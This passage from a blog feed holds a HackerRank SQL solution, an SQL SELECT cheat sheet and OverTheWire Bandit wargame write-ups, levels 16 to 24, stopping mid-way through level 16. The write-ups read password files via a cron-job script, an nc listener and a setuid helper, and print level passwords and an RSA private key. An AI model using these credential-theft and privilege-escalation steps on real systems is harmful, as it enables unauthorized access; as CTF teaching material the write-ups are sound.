src="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/Sin-t-tulo-1.png" alt="HackerRank SQL Preparation: Revising the Select Query I(MySQL)"/><p><strong>Problem Statement: </strong>Query all columns for American cities in the <strong>CITY</strong> table with populations larger than <code>100000</code>. The <strong>CountryCode</strong> for America is <code>USA</code>.</p><p><strong>Link:</strong><a href="https://www.hackerrank.com/challenges/revising-the-select-query/problem">HackerRank - Revising the SELECT Query</a></p><p><strong>Solution:</strong></p><pre><code class="language-sql">SELECT * FROM CITY WHERE POPULATION > 100000 AND COUNTRYCODE = 'USA';
</code></pre><p><strong>Explanation: </strong>This SQL query retrieves all columns (*) for cities in the <strong>CITY</strong> table where the population is greater than <code>100000</code> and the <strong>CountryCode</strong> is 'USA'. Here's a breakdown of each part:</p><ul><li><code>SELECT *</code>: Selects all columns from the <strong>CITY</strong> table.</li><li><code>FROM CITY</code>: Specifies the table from which to retrieve data, which is the <strong>CITY</strong> table in this case.</li><li><code>WHERE POPULATION > 100000</code>: Filters the rows to include only cities with a population larger than <code>100000</code>.</li><li><code>AND COUNTRYCODE = 'USA'</code>: Further narrows down the selection to cities located in America (USA) based on the <strong>CountryCode</strong> column.</li></ul>]]></content:encoded></item><item><title><![CDATA[The Ultimate SQL SELECT Cheat Sheet]]></title><description><![CDATA[SQL, with its vast array of commands and clauses, can be daunting to remember every detail. Here I will share a useful cheat sheet to write the most common SELECT queries.]]></description><link>https://artofcode.tech/the-ultimate-sql-select-cheat-sheet</link><guid isPermaLink="false">Ghost__Post__65f35c3897c35d001bfa9138</guid><category><![CDATA[sql]]></category><category><![CDATA[cheatsheet]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Thu, 14 Mar 2024 20:28:25 GMT</pubDate><media:content url="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/sqlselectcheatsheet.png" medium="image"/><content:encoded><![CDATA[<img src="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/sqlselectcheatsheet.png" alt="The Ultimate SQL SELECT Cheat Sheet"/><p>Have you ever found yourself staring blankly at your SQL code, trying to recall the syntax for a SELECT query? Don't worry; you're not alone. SQL, with its vast array of commands and clauses, can be daunting to remember every detail. Here I will share a useful cheat sheet to write the most common SELECT queries.</p><h3 id="the-power-of-a-cheat-sheet">The Power of a Cheat Sheet</h3><p>Memorizing every SQL command and its syntax is not easy, that's where cheat sheets come to the rescue. Instead of flipping through documentation a cheat sheet provides quick and easy access to essential commands.</p><p><strong>Deciphering the SELECT Query</strong></p><p>Let's check the anatomy of a SELECT query. At its core, this query retrieves data from one or more tables in a database. Here's a breakdown of its components:</p><ul><li><strong>SELECT:</strong> This keyword specifies the columns you want to retrieve from the database. You can either select specific columns or use the wildcard (*) to fetch all columns.</li><li><strong>FROM:</strong> Here, you specify the table or tables from which you want to retrieve data.</li><li><strong>DISTINCT (optional)</strong>: This optional keyword removes duplicate rows from the result set.</li><li><strong>WHERE(optional):</strong> This optional clause filters rows based on specified conditions. It allows you to narrow down your results to only those that meet certain criteria.</li><li><strong>GROUP BY(optional):</strong> When you want to group your results based on the values of one or more columns, you use this clause. It's commonly used in conjunction with aggregate functions.</li><li><strong>HAVING(optional):</strong> Similar to the WHERE clause, HAVING filters grouped rows based on specified conditions. It comes into play after the GROUP BY clause.</li><li><strong>ORDER BY (optional)</strong>: This optional clause sorts the result set based on specified columns or expressions.</li></ul><p>The base for a SELECT query will look like this:</p><pre><code class="language-sql">-- [Mandatory] SELECT: This keyword specifies the columns you want to retrieve from the database.
SELECT
column1, -- Specify columns to retrieve or * to fetch all columns
column2,
...
-- [Optional] DISTINCT: This keyword removes duplicate rows from the result set, ensuring only unique rows are returned.
-- Tipically used immediately after the SELECT keyword.
-- For example:
-- SELECT DISTINCT column1, column2 FROM table_name;
-- [Mandatory] FROM: Here, you specify the table or tables from which you want to retrieve data.
FROM
table1, -- [Mandatory] Specify at least one table
table2,
...;
-- [Optional] WHERE: This clause filters rows based on specified conditions.
-- For example:
-- SELECT * FROM employees WHERE salary > 50000;
-- [Optional] GROUP BY: When you want to group your results based on the values of one or more columns,
-- you use this clause. It's commonly used in conjunction with aggregate functions.
-- For example:
-- SELECT department_id, COUNT(*) FROM employees GROUP BY department_id;
-- [Optional] HAVING: Similar to the WHERE clause, HAVING filters grouped rows based on specified conditions.
-- It comes into play after the GROUP BY clause.
-- For example:
-- SELECT department_id, COUNT(*) FROM employees GROUP BY department_id HAVING COUNT(*) > 3;
-- [Optional] ORDER BY: This clause sorts the result set based on specified columns or expressions.
-- It's typically used to arrange the data in ascending or descending order.
-- For example:
-- SELECT employee_name, salary FROM employees ORDER BY salary DESC;
</code></pre><h3 id="some-examples">Some examples</h3><p>This query retrieves all columns from the employees table without applying any filtering criteria.</p><pre><code class="language-sql">-- Basic Example without WHERE Clause
SELECT *
FROM employees;
</code></pre><p>This query uses the <code>DISTINCT</code> keyword to retrieve unique values of the <code>department_id</code> column from the employees table.</p><pre><code class="language-sql">-- Example with DISTINCT
-- This query retrieves distinct values of the department_id column from the employees table.
SELECT DISTINCT department_id
FROM employees;
</code></pre><p>This query filters employee records based on the salary column, only returning those with a salary greater than $50,000.</p><pre><code class="language-sql">-- Example with WHERE Clause
-- This query retrieves employee records with a salary greater than $50,000.
SELECT employee_name, salary
FROM employees
WHERE salary > 50000;
</code></pre><p>This query groups employee records by department and calculates the count of employees in each department.</p><pre><code class="language-sql">-- Example with GROUP BY Clause
-- This query counts the number of employees in each department.
SELECT department_id, COUNT(*) AS employee_count
FROM employees
GROUP BY department_id;
</code></pre><p>This query first groups employee records by department and then filters the grouped results to only include departments with more than three employees.</p><pre><code class="language-sql">-- Example with HAVING Clause
-- This query finds departments with more than three employees.
SELECT department_id, COUNT(*) AS employee_count
FROM employees
GROUP BY department_id
HAVING COUNT(*) > 3;
</code></pre><p>This example retrieves employee records and sorts them by salary in descending order using the <code>ORDER BY</code> clause.</p><pre><code class="language-sql">-- Example with ORDER BY Clause
-- This query retrieves employee records sorted by salary in descending order.
SELECT employee_name, salary
FROM employees
ORDER BY salary DESC;
</code></pre><p>Happy querying!</p>]]></content:encoded></item><item><title><![CDATA[Bandit Level 23 → Level 24]]></title><description><![CDATA[Welcome back, in this level we will learn some basics of privilege escalation by abusing cron jobs.]]></description><link>https://artofcode.tech/bandit-level-23-level-24</link><guid isPermaLink="false">Ghost__Post__65ce70ce146d93001b454d82</guid><category><![CDATA[ctf]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[bandit]]></category><category><![CDATA[writeups]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Thu, 15 Feb 2024 20:19:31 GMT</pubDate><media:content url="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/qwertyuiop.png" medium="image"/><content:encoded><![CDATA[<h2 id="introduction">Introduction</h2><img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/qwertyuiop.png" alt="Bandit Level 23 → Level 24"/><p>Welcome back, in this level we will learn some basics of privilege escalation by abusing cron jobs.</p><h3 id="previous-flag">Previous flag</h3><pre><code>QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G
</code></pre><h3 id="checking-cron-files">Checking Cron files</h3><p>Let´s start checking cron jobs for the user <code>bandit24</code>.</p><pre><code class="language-bash">cat /etc/cron.d/cronjob_bandit24
</code></pre><p>The entries within this file reveal the location of a script in the /usr/bin folder.</p><h3 id="reading-cron-script">Reading Cron Script</h3><p>Let’s open the .sh script file and check its contents:</p><pre><code class="language-bash">cat /usr/bin/cronjob_bandit24.sh
</code></pre><p>The contents of this file show us that the cron job iterates over the files in the <code>/var/spool/bandit24/foo</code> folder and executes files owned by us, <code>bandit23</code></p><pre><code class="language-jsx">#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
owner="$(stat --format "%U" ./$i)"
if [ "${owner}" = "bandit23" ]; then
timeout -s 9 60 ./$i
fi
rm -f ./$i
fi
done
</code></pre><p>Let’s write a bash command that copies the password from <code>bandit24</code> to a temporary location</p><pre><code class="language-bash">
cat /etc/bandit_pass/bandit24 > /tmp/bandit23/password.txt
</code></pre><h3 id="abusing-the-cron-job">Abusing the Cron Job</h3><p>Create a directory and script to intercept the password:</p><pre><code class="language-bash">mkdir /tmp/bandit23
nano /var/spool/bandit24/foo/script.sh
</code></pre><p>Within the newly created script, inscribe the command we defined before:</p><pre><code class="language-bash">#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/bandit23/password.txt
</code></pre><p>Grant execution permissions to the script:</p><pre><code class="language-bash">chmod +x /var/spool/bandit24/foo/script.sh
</code></pre><p>Now, the exploit is set. After the cron job is executed, we can read the password for the next level:</p><pre><code class="language-bash">cat /tmp/bandit23/password.txt
</code></pre><p>Flag:</p><pre><code>VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
</code></pre>]]></content:encoded></item><item><title><![CDATA[Bandit Level 22 → Level 23]]></title><description><![CDATA[In this level, we'll navigate through the uses of cron jobs and bash scripting to find hidden files on a linux system.]]></description><link>https://artofcode.tech/bandit-level-22-level-23</link><guid isPermaLink="false">Ghost__Post__659f3420ea5b72001b73ebe4</guid><category><![CDATA[ctf]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[bandit]]></category><category><![CDATA[writeups]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Thu, 11 Jan 2024 00:21:48 GMT</pubDate><media:content url="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/2223.png" medium="image"/><content:encoded><![CDATA[<h2 id="introduction">Introduction</h2><img src="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/2223.png" alt="Bandit Level 22 → Level 23"/><p>In this level, we'll navigate through the uses of cron jobs and bash scripting to find hidden files on a linux system.</p><h3 id="previous-flag">Previous Flag</h3><pre><code>WdDozAdTM2z9DiFEQ2mGlwngMfj4EZff
</code></pre><h3 id="exploring-cron-jobs">Exploring Cron Jobs</h3><p>Our first clue leads us to investigate the cron jobs for the bandit23 user. Execute the following command to reveal the contents of the cron file:</p><pre><code class="language-bash">cat /etc/cron.d/cronjob_bandit23
</code></pre><p>This exposes the details of a scheduled task that executes a script at specified intervals.</p><h3 id="decoding-the-script">Decoding the Script</h3><p>Now, let's inspect the contents of the script executed by the cron job:</p><pre><code class="language-bash">cat /usr/bin/cronjob_bandit23.sh
</code></pre><p>The script is unveiled:</p><pre><code class="language-bash">#!/bin/bash
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
cat /etc/bandit_pass/$myname > /tmp/$mytarget
</code></pre><p>Breaking it down:</p><ul><li>The script identifies the current user and generates an MD5 hash using a specific string.</li><li>It then echoes the process of copying the password file from <code>/etc/bandit_pass/$myname</code> to <code>/tmp/$mytarget</code>.</li></ul><h3 id="calculating-the-hash">Calculating the Hash</h3><p>To unveil the target file and extract the password, we need to calculate the MD5 hash of "I am user bandit23":</p><pre><code class="language-bash">echo I am user bandit23 | md5sum | cut -d ' ' -f 1
</code></pre><p>This command yields the hash we seek.</p><h3 id="reaping-the-rewards">Reaping the Rewards</h3><p>Now, let's retrieve the password from the calculated hash:</p><pre><code class="language-bash">cat /tmp/8ca319486bfbbc3663ea0fbe81326349
</code></pre><p>And there it is, the flag to the next level:</p><pre><code>QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G
</code></pre>]]></content:encoded></item><item><title><![CDATA[Bandit Level 21 → Level 22]]></title><description><![CDATA[Welcome back, to the Bandit challenges! In this level, we'll learn to exploit cron jobs and bashscript files.]]></description><link>https://artofcode.tech/bandit-level-21-level-22</link><guid isPermaLink="false">Ghost__Post__6593505f184728001b292d80</guid><category><![CDATA[ctf]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[bandit]]></category><category><![CDATA[writeups]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Mon, 01 Jan 2024 23:59:51 GMT</pubDate><media:content url="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/2122.png" medium="image"/><content:encoded><![CDATA[<h2 id="introduction">Introduction</h2><img src="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/2122.png" alt="Bandit Level 21 → Level 22"/><p>Welcome back, to the Bandit challenges! In this level, we'll learn to exploit cron jobs and bashscript files.</p><h2 id="previous-flag">Previous Flag</h2><pre><code>NvEJF7oVjkddltPSrdKEFOllh9V1IBcq
</code></pre><h3 id="exploring-cron-jobs">Exploring Cron Jobs</h3><p>Our path to the next flag begins with exploring the cron jobs on the system. Let's list the contents of the <code>/etc/cron.d/</code> directory:</p><pre><code class="language-bash">ls -la /etc/cron.d/
</code></pre><p>This reveals the existence of a cron job named <code>cronjob_bandit22</code>.</p><h3 id="analyzing-cron-job-configuration">Analyzing Cron Job Configuration</h3><p>Let's examine the configuration of the <code>cronjob_bandit22</code>:</p><pre><code class="language-bash">cat /etc/cron.d/cronjob_bandit22
</code></pre><p>The output indicates that there's a scheduled job running every minute as <code>bandit22</code>:</p><pre><code>* * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
</code></pre><h3 id="understanding-the-script">Understanding the Script</h3><pre><code class="language-bash">cat /usr/bin/cronjob_bandit22.sh
</code></pre><p>The script does two things: it changes the permissions of a file in <code>/tmp/</code> and then copies the password for Bandit level 22 into that file.</p><pre><code class="language-bash">#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
</code></pre><h3 id="retrieving-the-flag">Retrieving the Flag</h3><p>Now, let's check the contents of the file in <code>/tmp/</code>:</p><pre><code class="language-bash">ls -la /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
</code></pre><p>This should unveil the password for Bandit level 22:</p><p>Flag:</p><pre><code>WdDozAdTM2z9DiFEQ2mGlwngMfj4EZff
</code></pre>]]></content:encoded></item><item><title><![CDATA[Bandit Level 20 → Level 21]]></title><description><![CDATA[Welcome back tothe OverTheWire Bandit challenges. In this level, we encounter a scenario involving networking and data transfer.]]></description><link>https://artofcode.tech/bandit-level-20-level-21</link><guid isPermaLink="false">Ghost__Post__658c993e6394d9001b551a93</guid><category><![CDATA[ctf]]></category><category><![CDATA[bandit]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[writeups]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Wed, 27 Dec 2023 21:42:57 GMT</pubDate><media:content url="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/2021.png" medium="image"/><content:encoded><![CDATA[<h2 id="introduction">Introduction</h2><img src="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/2021.png" alt="Bandit Level 20 → Level 21"/><p>Welcome back tothe OverTheWire Bandit challenges. In this level, we encounter a scenario involving networking and data transfer.</p><h2 id="previous-flag">Previous Flag</h2><p>Before we delve into the current challenge, let's input the flag from the previous level:</p><p>Flag:</p><pre><code>VxCazJaVykI6W36BkBU0mJTCM8rR95XT
</code></pre><h3 id="netcat">Netcat</h3><p>The provided command involves using Netcat (<code>nc</code>) to transfer the contents of the <code>/etc/bandit_pass/bandit20</code> file over a network connection. Let's break it down:</p><pre><code class="language-bash">cat /etc/bandit_pass/bandit20 | nc -lvp 1234 &
</code></pre><p>This command reads the password from the file and sends it over a network connection. The <code>nc -lvp 1234</code> part sets up a Netcat listener on port 1234, waiting to receive the data.</p><h3 id="connecting-with-suconnect">Connecting with suconnect</h3><p>Now, let's use the <code>./suconnect</code> command to establish a connection and retrieve the password:</p><pre><code class="language-bash">./suconnect 1234
</code></pre><p>This command initiates a connection to the Netcat listener on port 1234, allowing us to receive the contents of the password file.</p><h3 id="flag-unveiled">Flag Unveiled</h3><p>Upon successful execution, the password for Bandit level 21 should be displayed, providing us with the key to the next stage:</p><p>Flag:</p><pre><code>NvEJF7oVjkddltPSrdKEFOllh9V1IBcq
</code></pre>]]></content:encoded></item><item><title><![CDATA[Bandit Level 19→ Level 20]]></title><description><![CDATA[Greetings, Welcome back to the OverTheWire Bandit challenges. In this level, we are presented with a custom binary that has to be exploited to get secret information.]]></description><link>https://artofcode.tech/bandit-level-19-level-20</link><guid isPermaLink="false">Ghost__Post__657f4d339ba05c001b74e919</guid><category><![CDATA[ctf]]></category><category><![CDATA[bandit]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[writeups]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Sun, 17 Dec 2023 19:38:53 GMT</pubDate><media:content url="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/1920.png" medium="image"/><content:encoded><![CDATA[<h2 id="introduction">Introduction</h2><img src="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/1920.png" alt="Bandit Level 19→ Level 20"/><p>Greetings, Welcome back to the OverTheWire Bandit challenges. In this level, we are presented with a custom binary that has to be exploited to get secret information.</p><h2 id="previous-flag">Previous Flag</h2><p>In the previous challenge, we successfully acquired the following flag:</p><p>Flag:</p><pre><code>awhqfNnAbc1naukrpqDYcF95h7HoMTrC
</code></pre><h3 id="exploring-bandit20-do">Exploring bandit20-do</h3><p>Our next task involves the execution of the <code>./bandit20-do</code> command. Let's initiate it and see what it does:</p><pre><code class="language-bash">./bandit20-do
</code></pre><p>It seems like this binary executes whatever bash command we provide as the user we want to escalate to, bandit20.</p><h3 id="retrieving-bandit20-password">Retrieving Bandit20 Password</h3><p>Now that we have access to <code>bandit20-do</code>, let's utilize it to read the contents of the <code>/etc/bandit_pass/bandit20</code> file:</p><pre><code class="language-bash">./bandit20-do cat /etc/bandit_pass/bandit20
</code></pre><p>Executing this command should reveal the password for the Bandit level 20.</p><p>Flag:</p><pre><code>VxCazJaVykI6W36BkBU0mJTCM8rR95XT
</code></pre>]]></content:encoded></item><item><title><![CDATA[Bandit Level 18→ Level 19]]></title><description><![CDATA[In this level, we'll learn about SSH connections, command execution, and file retrieval.]]></description><link>https://artofcode.tech/bandit-level-18-level-19</link><guid isPermaLink="false">Ghost__Post__657e6d0d1c117d001bad7b91</guid><category><![CDATA[ctf]]></category><category><![CDATA[writeups]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[bandit]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Sun, 17 Dec 2023 03:45:57 GMT</pubDate><media:content url="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/ogrkgitt.png" medium="image"/><content:encoded><![CDATA[<h3 id="introduction">Introduction</h3><img src="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/ogrkgitt.png" alt="Bandit Level 18→ Level 19"/><p>In this level, we'll learn about SSH connections, command execution, and file retrieval.</p><p>Before we dive into this level, let's review the flag we obtained in the previous challenge:</p><p><code>hga5tuuCLF6fFzUpnagiMN8ssu9LFrdg</code></p><h3 id="step-1-ssh-into-the-server">Step 1: SSH into the Server</h3><p>Our first step is to SSH into the server. We'll use the following command to do so:</p><pre><code>ssh bandit18@bandit.labs.overthewire.org -p 2220 -t '/bin/sh'
</code></pre><p>This command connects us to the server, and we execute a shell to interact with it.</p><h3 id="step-2-retrieve-the-readme-file">Step 2: Retrieve the Readme File</h3><p>Once we've accessed the server, we need to retrieve the "readme" file. You can do this by executing:</p><pre><code>cat readme
</code></pre><p>This command will display the content of the "readme" file and the flag for the next level.</p><p>Flag: <code>awhqfNnAbc1naukrpqDYcF95h7HoMTrC</code></p>]]></content:encoded></item><item><title><![CDATA[Bandit Level 17 → Level 18]]></title><description><![CDATA[Greetings, Welcome back to the OverTheWire Bandit challenges. In this level, we're learning more about secure shell (SSH) and cryptographic keys.]]></description><link>https:artofcode.tech/bandit-level-17-level-18</link><guid isPermaLink="false">Ghost__Post__657a0616cdef42001b7ecfb7</guid><category><![CDATA[bandit]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[ctf]]></category><category><![CDATA[writeups]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Wed, 13 Dec 2023 19:32:20 GMT</pubDate><media:content url="https://res-4.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/1234567890.png" medium="image"/><content:encoded><![CDATA[<h2 id="introduction">Introduction</h2><img src="https://res-4.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/1234567890.png" alt="Bandit Level 17 → Level 18"/><p>Greetings, Welcome back to the OverTheWire Bandit challenges. In this level, we're learning more about secure shell (SSH) and cryptographic keys.</p><h2 id="previous-flag">Previous Flag</h2><p>In the preceding challenge, our triumph was securing the following flag:</p><pre><code class="language-jsx">-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ
imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ
Ja6LLzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu
DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW
JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX
x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD
KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl
J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd
d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC
YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A
vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama
+TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT
8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx
SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd
HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt
SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A
R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi
Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg
R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu
L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni
blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU
YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM
77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b
dxviW8+TFVEBl1
</code></pre><h3 id="decrypting-rsa-private-key">Decrypting RSA Private Key</h3><p>The adventure continues as we're presented with an RSA private key. Let's save it in a file named <code>private.key</code>:</p><pre><code class="language-bash">echo '-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ
imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ
Ja6LLzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu
DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW
JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX
x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD
KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl
J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd
d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC
YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A
vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama
+TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT
8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx
SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd
HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt
SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A
R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi
Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg
R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu
L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni
blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU
YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM
77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b
dxviW8+TFVEBl1
' > private.key
</code></pre><h3 id="ssh-connection-with-private-key">SSH Connection with Private Key</h3><p>Now that we have the private key, let's connect to the Bandit server using SSH:</p><pre><code class="language-bash">ssh -i private.key bandit17@bandit.labs.overthewire.org -p 2220
</code></pre><p>The <code>-i</code> flag specifies the private key file, and <code>-p</code> specifies the port.</p><h3 id="password-difference-check">Password Difference Check</h3><p>Finally, we need to compare the differences between the old and new passwords:</p><pre><code class="language-bash">diff passwords.old passwords.new
</code></pre><p>Explore the differences to find the key to the next level!</p><p>Flag:</p><pre><code>hga5tuuCLF6fFzUpnagiMN8ssu9LFrdg
</code></pre>]]></content:encoded></item><item><title><![CDATA[Bandit Level 16→ Level 17]]></title><description><![CDATA[In this level of the OverTheWire Bandit challenges, we'll learn how to scan for open ports and establish an SSL connection to retrieve the flag for the next level.]]></description><link>https://artofcode.tech/bandit-level-16-level-17</link><guid isPermaLink="false">Ghost__Post__65760d894a5a58001beaf69e</guid><category><![CDATA[bandit]]></category><category><![CDATA[ctf]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[writeups]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Sun, 10 Dec 2023 19:16:37 GMT</pubDate><media:content url="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/1234567.png" medium="image"/><content:encoded><![CDATA[<h2 id="introduction">Introduction</h2><img src="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/1234567.png" alt="Bandit Level 16→ Level 17"/><p>In this level of the OverTheWire Bandit challenges, we'll learn how to scan for open ports and establish an SSL connection to retrieve the flag for the next level.</p><h2 id="previous-flag">Previous Flag</h2><p>Flag: <code>JQttfApK4SeyHwDlI9SXGR50qclOAil1</code></p><h3 id="step-1-scanning-for-open-ports">Step 1: Scanning for Open Ports</h3><p>Begin by using the <code>nmap</code> command to scan for open ports on the local machine. We're particularly interested in ports within the range of 31000 to 32000.</p><pre><code>nmap -vvv -p 31000-32000 -Pn -n localhost
</code></pre><p>The output will identify which of these ports are open and may provide additional details about the services running on them.</p><h3 id="step-2-scanning-specific-ports">Step 2: Scanning Specific Ports</h3><p>After identifying open ports, proceed to scan specific ports for additional information. We'll use the <code>nmap</code> command again with specific ports: 31046, 31518, 31691, 31790, and 31960. We'll also include service and script scanning for comprehensive information.</p><pre><code>nmap -p31046,31518,31691,31790,31960 -vvv -sC -sV -n -Pn localhost --min-rate=5000
